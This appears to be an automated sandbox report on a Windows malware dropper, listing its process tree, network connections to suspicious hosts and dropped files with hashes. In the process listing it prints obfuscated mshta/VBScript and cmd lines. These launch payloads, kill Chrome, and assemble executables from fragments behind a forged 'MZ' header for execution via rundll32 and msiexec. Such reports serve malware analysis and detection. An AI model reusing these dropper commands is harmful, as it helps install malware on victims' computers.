C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vBSCript: CLose ( CrEAteOBjeCT ( "wsCrIPt.SHell"). RUN ( "CmD /Q /c TYPe ""C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri20ba391d4469.exe"" > EUUIXyGKjuAj.exe && STart EUUIXYgKJuAJ.EXE /pkrs9YKWRf3sVprfXBE2vA2Yg3 & IF """" == """" for %A iN ( ""C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri20ba391d4469.exe"" ) do taskkill /f /IM ""%~NxA"" " , 0 , true ) )

C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri20d5530575e8aa3ed.exe

"C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri20d5530575e8aa3ed.exe" /SILENT

C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri20fbc038b0b02ea.exe

C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri20fbc038b0b02ea.exe

C:\Users\Admin\AppData\Local\Temp\is-6JK77.tmp\Fri20d5530575e8aa3ed.tmp

"C:\Users\Admin\AppData\Local\Temp\is-6JK77.tmp\Fri20d5530575e8aa3ed.tmp" /SL5="$20266,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri20d5530575e8aa3ed.exe" /SILENT

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /Q /c TYPe "C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri20ba391d4469.exe" > EUUIXyGKjuAj.exe && STart EUUIXYgKJuAJ.EXE /pkrs9YKWRf3sVprfXBE2vA2Yg3 & IF "" == "" for %A iN ( "C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri20ba391d4469.exe" ) do taskkill /f /IM "%~NxA"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri208f5f140853548.exe" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "" =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri208f5f140853548.exe" ) do taskkill /F -Im "%~NxU"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 4568 -ip 4568

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4568 -s 360

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 4212 -ip 4212

C:\Users\Admin\AppData\Local\Temp\09xU.exE

09xU.EXE -pPtzyIkqLZoCarb5ew

C:\Users\Admin\AppData\Local\Temp\EUUIXyGKjuAj.exe

EUUIXYgKJuAJ.EXE /pkrs9YKWRf3sVprfXBE2vA2Yg3

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c taskkill /f /im chrome.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4212 -s 620

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /IM "Fri20ba391d4469.exe"

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ( "CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If ""-pPtzyIkqLZoCarb5ew "" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"" ) do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )

C:\Windows\SysWOW64\taskkill.exe

taskkill /F -Im "Fri208f5f140853548.exe"

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vBSCript: CLose ( CrEAteOBjeCT ( "wsCrIPt.SHell"). RUN ( "CmD /Q /c TYPe ""C:\Users\Admin\AppData\Local\Temp\EUUIXyGKjuAj.exe"" > EUUIXyGKjuAj.exe && STart EUUIXYgKJuAJ.EXE /pkrs9YKWRf3sVprfXBE2vA2Yg3 & IF ""/pkrs9YKWRf3sVprfXBE2vA2Yg3 "" == """" for %A iN ( ""C:\Users\Admin\AppData\Local\Temp\EUUIXyGKjuAj.exe"" ) do taskkill /f /IM ""%~NxA"" " , 0 , true ) )

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 4212 -ip 4212

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\09xU.exE" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "-pPtzyIkqLZoCarb5ew " =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\09xU.exE" ) do taskkill /F -Im "%~NxU"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4212 -s 640

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im chrome.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /Q /c TYPe "C:\Users\Admin\AppData\Local\Temp\EUUIXyGKjuAj.exe" > EUUIXyGKjuAj.exe && STart EUUIXYgKJuAJ.EXE /pkrs9YKWRf3sVprfXBE2vA2Yg3 & IF "/pkrs9YKWRf3sVprfXBE2vA2Yg3 " == "" for %A iN ( "C:\Users\Admin\AppData\Local\Temp\EUUIXyGKjuAj.exe" ) do taskkill /f /IM "%~NxA"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 4212 -ip 4212

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4212 -s 660

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vbScRipT: cloSE ( creAteobjECT ( "WscriPT.SHell" ). RuN ( "cMd.exE /Q /r eCHO | SET /P = ""MZ"" > ScMeAP.SU & CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I & StART control .\R6f7sE.I " , 0 ,TRuE ) )

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" VbsCript:CloSE ( CreAtEoBjEct ( "WscRiPt.ShElL" ). RUN ( "C:\Windows\system32\cmd.exe /R eCHo | sET /P = ""MZ"" >nQBnLF9A.W & cOPy /b /y NQBNLF9A.W + pajqYZJ.O + NuWKOG5W.G+ 6QI2.~ + R4QR.JT + lFAf.j 6~IPcLZ.rj & sTaRT msiexec /Y .\6~iPCLZ.rJ " , 0 , tRUE ) )

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /Q /r eCHO | SET /P = "MZ" > ScMeAP.SU &CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I& StART control .\R6f7sE.I

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 4212 -ip 4212

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /R eCHo | sET /P = "MZ" >nQBnLF9A.W & cOPy /b /y NQBNLF9A.W + pajqYZJ.O + NuWKOG5W.G+ 6QI2.~ + R4QR.JT + lFAf.j 6~IPcLZ.rj & sTaRT msiexec /Y .\6~iPCLZ.rJ

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" eCHO "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>ScMeAP.SU"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4212 -s 780

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" eCHo "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" sET /P = "MZ" 1>nQBnLF9A.W"

C:\Windows\SysWOW64\control.exe

control .\R6f7sE.I

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\R6f7sE.I

C:\Windows\SysWOW64\msiexec.exe

msiexec /Y .\6~iPCLZ.rJ

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 4212 -ip 4212

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4212 -s 784

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffec215cc40,0x7ffec215cc4c,0x7ffec215cc58

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1928,i,5135473508473110230,15839935129779680270,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1924 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2072,i,5135473508473110230,15839935129779680270,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2056 /prefetch:3

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2308,i,5135473508473110230,15839935129779680270,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2256 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3108,i,5135473508473110230,15839935129779680270,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3128 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3136,i,5135473508473110230,15839935129779680270,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3260 /prefetch:1

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4584,i,5135473508473110230,15839935129779680270,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4572 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri200ae385720d3.exe

Fri200ae385720d3.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 4212 -ip 4212

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4212 -s 640

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4764,i,5135473508473110230,15839935129779680270,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4060 /prefetch:8

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 4212 -ip 4212

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4212 -s 1124

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 4212 -ip 4212

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4212 -s 1132

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 4212 -ip 4212

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4212 -s 1400

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5104,i,5135473508473110230,15839935129779680270,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5116 /prefetch:8

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc

C:\Windows\system32\RunDll32.exe

C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\R6f7sE.I

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\R6f7sE.I

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 hsiens.xyz udp
NL 45.133.1.107:80 tcp
US 8.8.8.8:53 www.listincode.com udp
NL 45.133.1.107:80 tcp
US 8.8.8.8:53 iplogger.org udp
US 172.67.74.161:443 iplogger.org tcp
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 161.74.67.172.in-addr.arpa udp
US 8.8.8.8:53 topniemannpickshop.cc udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 niemannbest.me udp
US 8.8.8.8:53 all-mobile-pa1ments.com.mx udp
US 8.8.8.8:53 233.134.159.162.in-addr.arpa udp
US 8.8.8.8:53 c.pki.goog udp
US 8.8.8.8:53 buy-fantasy-football.com.sg udp
GB 142.250.200.3:80 c.pki.goog tcp
US 8.8.8.8:53 propanla.com udp
US 172.67.74.161:443 iplogger.org tcp
FI 135.181.129.119:4805 tcp
US 172.67.74.161:443 iplogger.org tcp
US 8.8.8.8:53 3.200.250.142.in-addr.arpa udp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 ppp-gl.biz udp
US 104.155.138.21:80 ppp-gl.biz tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 21.138.155.104.in-addr.arpa udp
US 8.8.8.8:53 www.iyiqian.com udp
SG 13.251.16.150:80 www.iyiqian.com tcp
N/A 127.0.0.1:51583 tcp
N/A 127.0.0.1:51585 tcp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 150.16.251.13.in-addr.arpa udp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 www.google.com udp
GB 172.217.16.228:443 www.google.com tcp
GB 172.217.16.228:443 www.google.com tcp
GB 172.217.16.228:443 www.google.com tcp
US 104.155.138.21:80 ppp-gl.biz tcp
GB 172.217.16.228:443 www.google.com udp
US 8.8.8.8:53 228.16.217.172.in-addr.arpa udp
US 8.8.8.8:53 10.178.250.142.in-addr.arpa udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 clients2.google.com udp
GB 142.250.178.14:443 clients2.google.com tcp
US 104.155.138.21:80 ppp-gl.biz tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 14.178.250.142.in-addr.arpa udp
US 8.8.8.8:53 t.gogamec.com udp
FI 135.181.129.119:4805 tcp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
NL 45.9.20.13:80 tcp
US 8.8.8.8:53 pastebin.com udp
US 104.20.3.235:443 pastebin.com tcp
US 8.8.8.8:53 t.gogamec.com udp
US 104.20.3.235:443 pastebin.com tcp
US 8.8.8.8:53 wfsdragon.ru udp
US 104.21.5.208:80 wfsdragon.ru tcp
US 104.21.5.208:80 wfsdragon.ru tcp
FR 51.178.186.149:80 tcp
US 8.8.8.8:53 235.3.20.104.in-addr.arpa udp
US 8.8.8.8:53 208.5.21.104.in-addr.arpa udp
FR 51.178.186.149:80 tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
FI 135.181.129.119:4805 tcp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 56.163.245.4.in-addr.arpa udp
US 8.8.8.8:53 t.gogamec.com udp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 67.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 t.gogamec.com udp
FI 135.181.129.119:4805 tcp
NL 194.104.136.5:46013 tcp
NL 45.9.20.13:80 tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
FI 135.181.129.119:4805 tcp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 t.gogamec.com udp
FI 135.181.129.119:4805 tcp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
NL 45.9.20.13:80 tcp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
NL 45.9.20.13:80 tcp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 t.gogamec.com udp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
NL 45.9.20.13:80 tcp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
FI 135.181.129.119:4805 tcp

Files

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

MD5 8f86dedab3baf5ffaaebb8a77d417737
SHA1 2469e1057b3a544402d57a602a916b0663a8ff8c
SHA256 b25679ef641f0a807ef8200eb0ec464680dfdfff23b42bad85099b140c5d5630
SHA512 2f70caeb89da15a3b1222b52cf49b09af61937b1bf92b5c0baad4d222a9c02f30e174cc9bd8078531fac26213fb990ab1cac78b13f38e7cbc75389685b0ec61c

C:\Users\Admin\AppData\Local\Temp\7zS460164F7\setup_install.exe

MD5 789258af8927e9426e113f79a5c2ebcf
SHA1 6c64f717f5fc68e602760fefbc2221fd35fd7530
SHA256 f17e3e76cebd7d97c927151c727d210dca439be0142db2db5a0ccc70d95b9923
SHA512 20cbd892411768fd4774fcb9f47f4eff754687808e58af8597714030e0705b53072b0128b8c32f5254836664276b242f8327427d0d6975cdfe6c3a90f4945ec3

C:\Users\Admin\AppData\Local\Temp\7zS460164F7\libwinpthread-1.dll

MD5 1e0d62c34ff2e649ebc5c372065732ee
SHA1 fcfaa36ba456159b26140a43e80fbd7e9d9af2de
SHA256 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723
SHA512 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

C:\Users\Admin\AppData\Local\Temp\7zS460164F7\libcurlpp.dll

MD5 e6e578373c2e416289a8da55f1dc5e8e
SHA1 b601a229b66ec3d19c2369b36216c6f6eb1c063e
SHA256 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f
SHA512 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

C:\Users\Admin\AppData\Local\Temp\7zS460164F7\libstdc++-6.dll

MD5 5e279950775baae5fea04d2cc4526bcc
SHA1 8aef1e10031c3629512c43dd8b0b5d9060878453
SHA256 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87
SHA512 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

C:\Users\Admin\AppData\Local\Temp\7zS460164F7\libcurl.dll

MD5 d09be1f47fd6b827c81a4812b4f7296f
SHA1 028ae3596c0790e6d7f9f2f3c8e9591527d267f7
SHA256 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e
SHA512 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

memory/4604-82-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/4604-86-0x0000000064940000-0x0000000064959000-memory.dmp

memory/4604-85-0x0000000064941000-0x000000006494F000-memory.dmp

memory/4604-84-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/4900-87-0x0000000002C20000-0x0000000002C56000-memory.dmp

memory/4900-88-0x00000000052F0000-0x0000000005918000-memory.dmp

memory/4604-83-0x00000000007A0000-0x000000000082F000-memory.dmp

memory/4604-81-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/4900-89-0x0000000005920000-0x0000000005942000-memory.dmp

memory/4900-91-0x0000000005B30000-0x0000000005B96000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_gkqk0uvo.yhe.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4900-90-0x0000000005AC0000-0x0000000005B26000-memory.dmp

memory/4900-101-0x0000000005BA0000-0x0000000005EF4000-memory.dmp

memory/4604-80-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/4604-79-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/4604-77-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/4604-76-0x000000006FE40000-0x000000006FFC6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri20fbc038b0b02ea.exe

MD5 a98672182143436478fdb3806ef6cd5a
SHA1 5d93bb55d9e7915afb11361f42a4c9c6393718b3
SHA256 2010cb8b8069ae8e5527526b36f28b78766473b71b67d601351eb361dbef8528
SHA512 0d2de593d1e194895833396c49efe194fca56afa3396e6aa41f8a51e961ea4f1ca97697ace0625ea97f5dfe7092b75049c58e582dda122cbc7966cb9a5d18892

C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri2060ea1c5d8fae8aa.exe

MD5 ba8541c57dd3aae16584e20effd4c74c
SHA1 5a49e309db2f74485db177fd9b69e901e900c97d
SHA256 dbc19cdcdf66065ddb1a01488dac2961b7aa1cde6143e8912bf74c829eaa2c6c
SHA512 1bdc7461faf32bba7264de0d1f26365ee285de687edef7d957194897fc398145414a63ad5255e6fc5b559e9979d82cf49e8adf4d9d58b86405c921aec027866d

C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri209d5bfbb2.exe

MD5 d08cc10c7c00e13dfb01513f7f817f87
SHA1 f3adddd06b5d5b3f7d61e2b72860de09b410f571
SHA256 0fb8440355ee2a2fe55de0661199620353a01ed4fd1b0d0a2082f4c226e98e0d
SHA512 0b9b8c7da24cdb882bc9b7a37689bc0e81d39f1277017b44512e9a17d9e4e44b314d5b3e06f332d64f3f6953f84d309d4027842ef0000ff012e7af5c9012caa0

C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri20e095683c2b3a0c.exe

MD5 44cfc728f9fbacd834c9b10ce768d41a
SHA1 6589a1435a2ba5ec11a312de5f339597831227d0
SHA256 874c4eab9d0422ee52a1e02e4e95b07805a143dda5a54a19c6a122580aabdb68
SHA512 dd899e05bcbfaec1c3f46011367e000f3edfca1c2f542f9ed55bcbd136142940733f8aa8cd67bd5f647329195ffb843a255713dae362bc44a817734163409113

C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri208f5f140853548.exe

MD5 7c6b2dc2c253c2a6a3708605737aa9ae
SHA1 cf4284f29f740b4925fb2902f7c3f234a5744718
SHA256 b45c9de845522095bbfa55166b519b2be36a08cea688491b9f339e862e79c3ba
SHA512 19579900d07912096641cc7381131ff6fcf60fffc99cdab23f7d8a577aa926bbf0e885a3a7869298bbfc0a05e276c1d5f45712812e4df6980e9554fc48162b07

C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri209c4b463b.exe

MD5 a729d63514511766fcdd2de19cdbd017
SHA1 737827e5c0ab0adc287d3b3bb16d26a9a42f0939
SHA256 6dda16414ec5a7f6908f6088ea5edb7c67b024c3f695fbf7048ab823bcfee728
SHA512 ad6bc65c950a94383f3f1d987508d22167343db632412b74d4734482916a7c18981dc8d84c57109f0882f6c5c6f280db876bafd24837f06996614d1bb9ce6ee2

C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri20c0c46650eeb2a.exe

MD5 ecc773623762e2e326d7683a9758491b
SHA1 ad186c867976dc5909843418853d54d4065c24ba
SHA256 8f97a40b4d9cf26913ab95eec548d75a8dad5a1a24d992d047e080070282d838
SHA512 40e30981f533b19123ec3d84276a28acd282c01907398ca6d67155901cfaf2c2d6355dc708d0ecfc6c21b5c671b4c3bb87eeb53183b7085474a2acd302f038a4

C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri2002ce5f91c761.exe

MD5 39fbed3967544cc6a59e1d1152cdcc35
SHA1 b9e974a506f3be7fc78574ae008e7686093eb82d
SHA256 cb9c63211d26b56dff5651f9fc8a872fd9aab26dfa32df84086aa86ab39810e6
SHA512 cade223df33187f024aaf18794f5890c08cc3387f3e3417908220cc690a55275b558a83e219fb45c98b5c728746fb211d6a68eec0a7e62d08f4b05cc07b8ede3

C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri20d5530575e8aa3ed.exe

MD5 7c20266d1026a771cc3748fe31262057
SHA1 fc83150d1f81bfb2ff3c3d004ca864d53004fd27
SHA256 4b2fb0f42a923104b69a45aa7a503fbd08739ebf3711599303aa15692136fa46
SHA512 e18c803e38a2111857519639b1ac838edc5b496a79fc579c7329188c66ba791cc499874132e4d616c24447d0cc5ebe7659f69ed1a810bea1a675b94d089b995f

C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri20ba391d4469.exe

MD5 85ef31a707d583032b8526d16e8883a8
SHA1 16beed53fc46bf75cf4081d73dc843f4d8298569
SHA256 bce2f04e884c2dd6e799861898546be00a745fa1e743ce51044d2232065d2409
